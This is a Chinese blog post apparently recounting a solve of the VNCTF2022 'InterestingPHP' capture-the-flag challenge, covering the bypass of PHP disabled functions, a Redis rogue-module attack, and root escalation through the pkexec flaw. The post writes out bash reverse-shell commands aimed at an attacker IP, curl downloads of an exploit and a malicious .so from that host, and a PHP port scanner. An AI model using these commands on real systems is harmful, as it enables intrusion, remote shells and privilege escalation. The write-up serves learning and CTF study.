<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="php,ssrf,redis,privilge escalation," />





  <link rel="alternate" href="/atom.xml" title="M1seryの厨房" type="application/atom+xml" />






<meta name="description" content="虽然这道题不看其他师傅们的wp是真的搞不动，完全是一步一步照着师傅们的脚步走的，但这道题收获的最大的其实是我们做题时该有的思路了。 从过滤受阻开始，信息收集、定点攻击，到反弹shell、权限提升，更加明确和清晰的进攻思路，才是完成这次复现后想要收获的。 我是一个一个一个卡其脱离太啊啊啊啊啊啊啊（指禁止停下刷题">
<meta property="og:type" content="article">
<meta property="og:title" content="VNCTF2022 InterestingPHP 复现">
<meta property="og:url" content="https://www.m0x01sery.com/2022/03/20/[VN2022]InterestingPHP/index.html">
<meta property="og:site_name" content="M1seryの厨房">
<meta property="og:description" content="虽然这道题不看其他师傅们的wp是真的搞不动，完全是一步一步照着师傅们的脚步走的，但这道题收获的最大的其实是我们做题时该有的思路了。 从过滤受阻开始，信息收集、定点攻击，到反弹shell、权限提升，更加明确和清晰的进攻思路，才是完成这次复现后想要收获的。 我是一个一个一个卡其脱离太啊啊啊啊啊啊啊（指禁止停下刷题">
<meta property="og:locale">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/2022-03-24-16-30-10.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/2022-03-24-16-31-03.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/2022-03-24-16-32-04.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/2022-03-24-16-32-29.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/2022-03-24-16-35-23.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/2022-03-24-16-36-00.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/20220330215008.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/20220330215432.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/20220330221032.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/20220331124321.png">
<meta property="og:image" content="https://www.m0x01sery.com/images/BUU/20220331125842.png">
<meta property="article:published_time" content="2022-03-19T16:00:00.000Z">
<meta property="article:modified_time" content="2022-03-29T16:00:00.000Z">
<meta property="article:author" content="M1sery">
<meta property="article:tag" content="php">
<meta property="article:tag" content="ssrf">
<meta property="article:tag" content="redis">
<meta property="article:tag" content="privilge escalation">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.m0x01sery.com/images/BUU/2022-03-24-16-30-10.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://www.m0x01sery.com/2022/03/20/[VN2022]InterestingPHP/"/>





  <title>VNCTF2022 InterestingPHP 复现 | M1seryの厨房</title>
  








<meta name="generator" content="Hexo 5.4.2"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">M1seryの厨房</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description"></h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.m0x01sery.com/2022/03/20/%5BVN2022%5DInterestingPHP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="M1sery">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/23333.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="M1seryの厨房">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">VNCTF2022 InterestingPHP 复现</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2022-03-20T00:00:00+08:00">
                2022-03-20
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2022-03-30T00:00:00+08:00">
                2022-03-30
              </time>
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>虽然这道题不看其他师傅们的wp是真的搞不动，完全是一步一步照着师傅们的脚步走的，但这道题收获的最大的其实是我们做题时该有的思路了。</p>
<p>从过滤受阻开始，信息收集、定点攻击，到反弹shell、权限提升，更加明确和清晰的进攻思路，才是完成这次复现后想要收获的。</p>
<p>我是一个一个一个卡其脱离太啊啊啊啊啊啊啊（指禁止停下刷题</p>
<span id="more"></span>

<h1 id="食材复刻"><a href="#食材复刻" class="headerlink" title="食材复刻"></a>食材复刻</h1><p>开幕RCE 注定这道题不会简单</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>); @<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;exp&#x27;</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>试了常用命令都无回显，phpinfo也被禁止，但神奇的<code>ini_get_all()</code>能帮我们获取php配置信息，太棒了</p>
<p><code>?exp=var_dump(ini_get_all());</code> 直奔<code>disable</code>系列</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">disable_classes</span><br><span class="line"></span><br><span class="line"><span class="built_in">Exception</span>,<span class="built_in">DirectoryIterator</span>,<span class="built_in">FilesystemIterator</span>,<span class="built_in">SplFileObject</span>,<span class="built_in">SplDoublyLinkedList</span>,<span class="built_in">Error</span>,<span class="built_in">ErrorException</span>,RedisException</span><br></pre></td></tr></table></figure>

<figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">disable_functions</span><br><span class="line"></span><br><span class="line">include,include_once,require,require_once,stream_get_contents,<span class="keyword">fwrite</span>,readfile,file_get_contents,<span class="keyword">fread</span>,fgets,fgetss,<span class="keyword">file</span>,parse_ini_file,show_source,fsockopen,proc_open,ini_set,pfsockopen,ini_alter,ini_get,posix_kill,phpinfo,<span class="keyword">putenv</span>,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,<span class="keyword">system</span>,<span class="keyword">exec</span>,shell_exec,<span class="keyword">popen</span>,passthru,symlink,link,syslog,imap_open,dl,mail,stream_socket_client,error_log,debug_backtrace,debug_print_backtrace,gc_collect_cycles,array_merge_recursive,get_cfg_var</span><br></pre></td></tr></table></figure>

<p>看到这一串输出的瞬间人就麻了 苦鲁西（瘫</p>
<h2 id="姿势一（非预期）"><a href="#姿势一（非预期）" class="headerlink" title="姿势一（非预期）"></a>姿势一（非预期）</h2><p>不管怎么说，过滤再强大（指限制多），也是假的，不是真的，所以，要先手开团，故意找茬（指绕过</p>
<p>在获取到的信息如此多而杂的情况下，靠人眼判断实在是难。</p>
<p>许多wp里都提到了<strong>mm0r1</strong>师傅的<a target="_blank" rel="noopener" href="https://github.com/mm0r1/exploits">php-bypass系列exp</a> 太顶了（什么时候自己也能写出这样重量级的exp呢……即使现在还是幻想 愿望还是要有的嘛</p>
<p>这里用到的是<a target="_blank" rel="noopener" href="https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php">php-filter-bypass</a>，其中<code>fwrite()</code>被禁了，改成<code>fputs()</code>就好</p>
<p>测试结果完美</p>
<p><img src="/images/BUU/2022-03-24-16-30-10.png"></p>
<p>构造数据包时还遇到几个新的小知识点，在这里记录下来。</p>
<p><strong>Multipart/form-data</strong>请求</p>
<blockquote>
<p>1.multipart/form-data的基础方式是post，也就是说通过post组合方式来实现的。</p>
<p>2.multipart/form-data于post方法的不同之处在于请求头和请求体。</p>
<p>3.multipart/form-data的请求头必须包含一个特殊的头信息：Content-Type，其值也必须为multipart/form-data，同时还需要规定一个内容分割用于分割请求提中多个post的内容，如文件内容和文本内容是需要分隔开来的，不然接收方就无法解析和还原这个文件了，具体的头信息如下：</p>
<p>Content-Type: multipart/form-data; boundary=${bound}  </p>
<p>其中${bound} 是一个占位符，代表我们规定的分割符，可以自己任意规定，但为了避免和正常文本重复了，尽量要使用复杂一点的内容。如：--------------------56423498738365</p>
</blockquote>
<p>这样我们发送的exp才会视作为一个整体，而不是被分割的各部分。</p>
<p><img src="/images/BUU/2022-03-24-16-31-03.png"></p>
<p>右边的Inspector也清楚地展示了被分割后的数据，这显然不是我们想要的结果，因此才会需要使用Multipart/form-data方法。</p>
<p><strong>Content-Disposition</strong>响应标头</p>
<blockquote>
<p>在一个multipart/form-data正文中，HTTP Content-Disposition通用标题是一个标题，可以在多部分主体的子部分中使用，以提供有关它适用的字段的信息。</p>
</blockquote>
<p>个人的初步理解是，可以看作将在此分界线以内的data全部赋值给<code>name</code>。</p>
<p><img src="/images/BUU/2022-03-24-16-32-04.png"></p>
<p>既然现在都能命令执行了，干的第一票一定是<strong>反弹shell</strong>，交互式的操作环境总是更方便的。</p>
<p>攻击机监听2333端口</p>
<p><code>nc -lvp 2333</code></p>
<p>exp修改执行命令</p>
<p><code>pwn(&quot;bash -c &#39;bash -i &gt;&amp; /dev/tcp/233.33.3.333/2333 0&gt;&amp;1&#39;&quot;);</code></p>
<p>成功获得shell，直冲根目录</p>
<p><img src="/images/BUU/2022-03-24-16-32-29.png"></p>
<p>老火 看来是权限不够（cat命令没有被限制） 最开始的<code>whoami</code>命令执行回显似乎也在提醒我们，你<strong>www-data</strong>是什么用户啊，你<strong>www-data</strong>什么的都在读flag，他能读吗！读不了，没这个实力（指权限），知道嘛（悲</p>
<p>能打开文件的各种命令都试过了，看来是只剩下提权一条路了</p>
<p>最容易想到的应该是<code>SUID提权</code></p>
<blockquote>
<p>SUID (Set UID)是Linux中的一种特殊权限，其功能为用户运行某个程序时，如果该程序有SUID权限，那么程序运行为进程时，进程的属主不是发起者，而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件，对于非可执行文件设置SUID没有任何意义。</p>
<p>在执行过程中，调用者会暂时获得该文件的所有者权限，且该权限只在程序执行的过程中有效。通俗的来讲，假设我们现在有一个可执行文件ls，其属主为root，当我们通过非root用户登录时，如果ls设置了SUID权限，我们可在非root用户下运行该二进制可执行文件，在执行文件时，该进程的权限将为root权限。利用此特性，我们可通过SUID进行提权。</p>
<p>现在已知的具有SUID权限的二进制可执行文件大体有如下这些</p>
<p>nmap<br>vim<br>find<br>bash<br>more<br>less<br>nano<br>cp<br>awk</p>
</blockquote>
<p>执行命令<code>find / -user root -perm -4000 -print 2&gt;/dev/null</code></p>
<blockquote>
<p>准确的说，这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们，然后将所有错误重定向到/dev/null，从而仅列出该用户具有访问权限的那些二进制文件。</p>
</blockquote>
<p><img src="/images/BUU/2022-03-24-16-35-23.png"></p>
<p>利用点即为<a target="_blank" rel="noopener" href="https://saucer-man.com/information_security/876.html">pkexec提权漏洞</a></p>
<p>同时附上<a target="_blank" rel="noopener" href="https://github.com/arthepsy/CVE-2021-4034">poc</a> 放在自己VPS上 再通过<code>curl</code>下载</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl http://233.33.3.333/poc.c &gt; /tmp/poc.c</span><br><span class="line">gcc poc.c -o poc</span><br><span class="line">./poc</span><br></pre></td></tr></table></figure>

<p><img src="/images/BUU/2022-03-24-16-36-00.png"></p>
<p>（瘫）</p>
<h2 id="姿势二"><a href="#姿势二" class="headerlink" title="姿势二"></a>姿势二</h2><p>用<code>ini_get_all()</code>得到php相关配置信息后，使用<code>scandir()</code>探测到目录下存在<code>secret.rdb</code>文件，即redis数据备份文件；</p>
<p><img src="/images/BUU/20220330215008.png"></p>
<p>拖下来找到一些好康的</p>
<p><img src="/images/BUU/20220330215432.png"></p>
<p>猜测<code>ye_w4nt_a_gir1fri3nd</code>即redis服务的密码。</p>
<p>但默认端口6379并没有开放，万事俱备，只欠端口</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">for</span>(<span class="variable">$i</span> = <span class="number">0</span>;<span class="variable">$i</span>&lt;<span class="number">65535</span>;<span class="variable">$i</span>++) &#123;</span><br><span class="line">    <span class="variable">$t</span> = <span class="title function_ invoke__">stream_socket_server</span>(<span class="string">&quot;tcp://0.0.0.0:&quot;</span>.<span class="variable">$i</span>,<span class="variable">$ee</span>,<span class="variable">$ee2</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$ee2</span> === <span class="string">&quot;Address already in use&quot;</span>) &#123;</span><br><span class="line">        <span class="title function_ invoke__">var_dump</span>(<span class="variable">$i</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/images/BUU/20220330221032.png"></p>
<p>发现<code>80</code>和<code>8888</code>端口开放，从而知晓redis端口<code>8888</code></p>
<p>同时函数<code>get_loaded_extensions()</code>可以看到php加载的插件</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">array</span><span class="params">(<span class="number">34</span>)</span></span> &#123; <span class="selector-attr">[0]</span>=&gt; <span class="built_in">string</span>(<span class="number">4</span>) <span class="string">&quot;Core&quot;</span> <span class="selector-attr">[1]</span>=&gt; <span class="built_in">string</span>(<span class="number">4</span>) <span class="string">&quot;date&quot;</span> <span class="selector-attr">[2]</span>=&gt; <span class="built_in">string</span>(<span class="number">6</span>) <span class="string">&quot;libxml&quot;</span> <span class="selector-attr">[3]</span>=&gt; <span class="built_in">string</span>(<span class="number">7</span>) <span class="string">&quot;openssl&quot;</span> <span class="selector-attr">[4]</span>=&gt; <span class="built_in">string</span>(<span class="number">4</span>) <span class="string">&quot;pcre&quot;</span> <span class="selector-attr">[5]</span>=&gt; <span class="built_in">string</span>(<span class="number">7</span>) <span class="string">&quot;sqlite3&quot;</span> <span class="selector-attr">[6]</span>=&gt; <span class="built_in">string</span>(<span class="number">4</span>) <span class="string">&quot;zlib&quot;</span> <span class="selector-attr">[7]</span>=&gt; <span class="built_in">string</span>(<span class="number">5</span>) <span class="string">&quot;ctype&quot;</span> <span class="selector-attr">[8]</span>=&gt; <span class="built_in">string</span>(<span class="number">4</span>) <span class="string">&quot;curl&quot;</span> <span class="selector-attr">[9]</span>=&gt; <span class="built_in">string</span>(<span class="number">3</span>) <span class="string">&quot;dom&quot;</span> <span class="selector-attr">[10]</span>=&gt; <span class="built_in">string</span>(<span class="number">8</span>) <span class="string">&quot;fileinfo&quot;</span> <span class="selector-attr">[11]</span>=&gt; <span class="built_in">string</span>(<span class="number">6</span>) <span class="string">&quot;filter&quot;</span> <span class="selector-attr">[12]</span>=&gt; <span class="built_in">string</span>(<span class="number">3</span>) <span class="string">&quot;ftp&quot;</span> <span class="selector-attr">[13]</span>=&gt; <span class="built_in">string</span>(<span class="number">4</span>) <span class="string">&quot;hash&quot;</span> <span class="selector-attr">[14]</span>=&gt; <span class="built_in">string</span>(<span class="number">5</span>) <span class="string">&quot;iconv&quot;</span> <span class="selector-attr">[15]</span>=&gt; <span class="built_in">string</span>(<span class="number">4</span>) <span class="string">&quot;json&quot;</span> <span class="selector-attr">[16]</span>=&gt; <span class="built_in">string</span>(<span class="number">8</span>) <span class="string">&quot;mbstring&quot;</span> <span class="selector-attr">[17]</span>=&gt; <span class="built_in">string</span>(<span class="number">3</span>) <span class="string">&quot;SPL&quot;</span> <span class="selector-attr">[18]</span>=&gt; <span class="built_in">string</span>(<span class="number">3</span>) <span class="string">&quot;PDO&quot;</span> <span class="selector-attr">[19]</span>=&gt; <span class="built_in">string</span>(<span class="number">7</span>) <span class="string">&quot;session&quot;</span> <span class="selector-attr">[20]</span>=&gt; <span class="built_in">string</span>(<span class="number">5</span>) <span class="string">&quot;posix&quot;</span> <span class="selector-attr">[21]</span>=&gt; <span class="built_in">string</span>(<span class="number">10</span>) <span class="string">&quot;Reflection&quot;</span> <span class="selector-attr">[22]</span>=&gt; <span class="built_in">string</span>(<span class="number">8</span>) <span class="string">&quot;standard&quot;</span> <span class="selector-attr">[23]</span>=&gt; <span class="built_in">string</span>(<span class="number">9</span>) <span class="string">&quot;SimpleXML&quot;</span> <span class="selector-attr">[24]</span>=&gt; <span class="built_in">string</span>(<span class="number">10</span>) <span class="string">&quot;pdo_sqlite&quot;</span> <span class="selector-attr">[25]</span>=&gt; <span class="built_in">string</span>(<span class="number">4</span>) <span class="string">&quot;Phar&quot;</span> <span class="selector-attr">[26]</span>=&gt; <span class="built_in">string</span>(<span class="number">9</span>) <span class="string">&quot;tokenizer&quot;</span> <span class="selector-attr">[27]</span>=&gt; <span class="built_in">string</span>(<span class="number">3</span>) <span class="string">&quot;xml&quot;</span> <span class="selector-attr">[28]</span>=&gt; <span class="built_in">string</span>(<span class="number">9</span>) <span class="string">&quot;xmlreader&quot;</span> <span class="selector-attr">[29]</span>=&gt; <span class="built_in">string</span>(<span class="number">9</span>) <span class="string">&quot;xmlwriter&quot;</span> <span class="selector-attr">[30]</span>=&gt; <span class="built_in">string</span>(<span class="number">7</span>) <span class="string">&quot;mysqlnd&quot;</span> <span class="selector-attr">[31]</span>=&gt; <span class="built_in">string</span>(<span class="number">14</span>) <span class="string">&quot;apache2handler&quot;</span> <span class="selector-attr">[32]</span>=&gt; <span class="built_in">string</span>(<span class="number">5</span>) <span class="string">&quot;redis&quot;</span> <span class="selector-attr">[33]</span>=&gt; <span class="built_in">string</span>(<span class="number">6</span>) <span class="string">&quot;sodium&quot;</span> &#125;</span><br></pre></td></tr></table></figure>

<p>可以看到题目环境加载了redis插件，搜索得知这个插件的Redis类中的<code>rawCommand()</code>方法可以执行redis命令。</p>
<p>先利用<code>curl+file_put_contents()</code>写入redis主从复制rce的<a target="_blank" rel="noopener" href="https://github.com/n0b0dyCN/redis-rogue-server">.so文件</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Curl</span>(<span class="params"><span class="variable">$url</span></span>) </span>&#123;</span><br><span class="line">    <span class="variable">$ch</span> = <span class="title function_ invoke__">curl_init</span>();</span><br><span class="line">    <span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$ch</span>, CURLOPT_URL, <span class="variable">$url</span>);</span><br><span class="line">    <span class="title function_ invoke__">curl_setopt</span> ( <span class="variable">$ch</span>, CURLOPT_RETURNTRANSFER, <span class="literal">true</span> );</span><br><span class="line">    <span class="variable">$result</span> = <span class="title function_ invoke__">curl_exec</span>(<span class="variable">$ch</span>);</span><br><span class="line">    <span class="title function_ invoke__">curl_close</span>(<span class="variable">$ch</span>);</span><br><span class="line">    <span class="title function_ invoke__">file_put_contents</span>(<span class="string">&quot;exp.so&quot;</span>,<span class="variable">$result</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">Curl</span>(<span class="string">&quot;http://233.33.3.333/exp.so&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><img src="/images/BUU/20220331124321.png"></p>
<p>然后构造反弹shell的payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$redis</span> = <span class="keyword">new</span> <span class="title class_">Redis</span>();</span><br><span class="line"><span class="variable">$redis</span>-&gt;<span class="title function_ invoke__">connect</span>(<span class="string">&#x27;127.0.0.1&#x27;</span>, <span class="number">8888</span>);</span><br><span class="line"><span class="variable">$redis</span>-&gt;<span class="title function_ invoke__">auth</span>(<span class="string">&#x27;ye_w4nt_a_gir1fri3nd&#x27;</span>);</span><br><span class="line"><span class="variable">$redis</span>-&gt;<span class="title function_ invoke__">rawCommand</span>(<span class="string">&#x27;module&#x27;</span>, <span class="string">&#x27;load&#x27;</span>, <span class="string">&#x27;/var/www/html/exp.so&#x27;</span>);</span><br><span class="line"><span class="variable">$redis</span>-&gt;<span class="title function_ invoke__">rawCommand</span>(<span class="string">&#x27;system.exec&#x27;</span>, <span class="string">&#x27;bash -c&#x27;</span>, <span class="string">&#x27;exec bash -i &amp;&gt; /dev/tcp/233.33.3.333/2333 0&gt;&amp;1&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>反弹成功</p>
<p><img src="/images/BUU/20220331125842.png"></p>
<p>接下来的提权操作和前面完全一致。</p>
<h1 id="菜单上新"><a href="#菜单上新" class="headerlink" title="菜单上新"></a>菜单上新</h1><p>强迫自己跨难度复现学习，这道InterestingPHP教会了我太多。</p>
<p>虽说还有许多基础如redis数据库、sockets编程、权限提升等等没有深入学习，但接触过这次后，我相信不久后我们还会再见的。那时的我相信也不会再像这次一样找不着北了。</p>
<p>继续跑，不要停（指学习</p>
<p>（瘫）</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/php/" rel="tag"># php</a>
          
            <a href="/tags/ssrf/" rel="tag"># ssrf</a>
          
            <a href="/tags/redis/" rel="tag"># redis</a>
          
            <a href="/tags/privilge-escalation/" rel="tag"># privilge escalation</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2022/03/09/computer-networks-basic/" rel="next" title="域肾透——从看懂到看开 0x00">
                <i class="fa fa-chevron-left"></i> 域肾透——从看懂到看开 0x00
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2022/03/28/rce-without-w-and-n/" rel="prev" title="无字母数字RCE初探">
                无字母数字RCE初探 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/23333.jpg"
                alt="M1sery" />
            
              <p class="site-author-name" itemprop="name">M1sery</p>
              <p class="site-description motion-element" itemprop="description">愿你有一天能和你最重要的人重逢。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">归档</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/M1serry" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                食物们
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.pysnow.cn" title="Pysnow" target="_blank">Pysnow</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://s0rry.cn" title="s0rry" target="_blank">s0rry</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jiangnaij.cn/" title="JiangnaiJ" target="_blank">JiangnaiJ</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://arsenetang.github.io/" title="Arsene.Tang" target="_blank">Arsene.Tang</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://zltt197.github.io" title="zltt" target="_blank">zltt</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://jev0n.com/" title="jev0n" target="_blank">jev0n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
